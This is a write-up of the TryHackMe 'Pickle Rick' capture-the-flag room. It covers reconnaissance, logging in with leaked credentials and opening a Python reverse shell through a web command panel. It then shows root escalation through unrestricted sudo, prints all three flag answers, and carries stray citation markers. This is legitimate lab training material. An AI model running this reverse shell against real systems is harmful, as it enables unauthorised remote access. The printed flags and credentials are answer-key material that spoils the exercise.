TRYHACKME WRITE-UP: PICKLE RICK
============================================================

STEP 1: RECONNAISSANCE
------------------------------------------------------------
1. Checking Source Code:
   - On the homepage, I inspected the page source code.
   - [cite_start]I discovered a note hidden within an HTML comment[cite: 5].
   - [cite_start]Extracted Information: Username is "R1ckRul3s"[cite: 5].

2. Directory Busting:
   - [cite_start]I used Dirsearch to scan for hidden directories and files on the server[cite: 6].
   - Command used:
     dirsearch -u http://10.49.160.65/
   
   - [cite_start]Key results found[cite: 8]:
     /assets/
     /login.php
     /robots.txt

3. Checking robots.txt:
   - I accessed http://10.49.160.65/robots.txt.
   - [cite_start]Content found: "Wubbalubbadubdub"[cite: 9].
   -> Inference: This string is likely the password.

------------------------------------------------------------
STEP 2: INITIAL ACCESS
------------------------------------------------------------
1. Logging In:
   - [cite_start]Navigated to /login.php[cite: 9].
   - Username: R1ckRul3s
   - Password: Wubbalubbadubdub
   -> Login successful. Redirected to the "Command Panel".

2. Creating a Reverse Shell:
   - On the attacking machine (Kali), I started a listener:
     nc -lvnp 4444
   
   - [cite_start]On the web Command Panel, I injected a Python Payload to connect back to my machine[cite: 10]:
     python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.139.123",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

   -> Result: Connection received. I gained access as user "www-data".

------------------------------------------------------------
STEP 3: FINDING FLAGS (POST-EXPLOITATION)
------------------------------------------------------------
1. Flag 1 (Ingredient 1):
   - Listed files in the current directory:
     ls
   - [cite_start]Read the content of the secret file[cite: 10]:
     cat Sup3rS3cretPickl3Ingred.txt
   [cite_start]-> Result: mr. meeseek hair [cite: 10]

   - Checked the clue file:
     cat clue.txt
     (Hint: "Look around the file system for the other ingredient.") [cite_start][cite: 10]

2. Flag 2 (Ingredient 2):
   - [cite_start]Navigated to Rick's home directory[cite: 10]:
     cd /home
     cd rick
   
   - Listed files and found "second ingredients". [cite_start]Since the filename contains a space, I used quotes to read it[cite: 11]:
     cat "second ingredients"
   [cite_start]-> Result: 1 jerry tear [cite: 11]

------------------------------------------------------------
STEP 4: PRIVILEGE ESCALATION
------------------------------------------------------------
1. Checking Sudo Permissions:
   - [cite_start]Ran the following command to check current user privileges[cite: 11]:
     sudo -l
   
   - [cite_start]Output received[cite: 11]:
     (ALL) NOPASSWD: ALL
   -> User www-data can run any command as root without a password.

2. Escalating to Root and Getting the Final Flag:
   - [cite_start]Switched to a root shell[cite: 11]:
     sudo bash -i
   
   - [cite_start]Navigated to the root directory and read the flag[cite: 11]:
     cd /root
     ls
     cat 3rd.txt
   [cite_start]-> Result: 3rd ingredients: fleeb juice [cite: 11]

============================================================
SUMMARY
============================================================
All 3 ingredients (Flags) have been found:
1. mr. meeseek hair
2. 1 jerry tear
3. fleeb juice
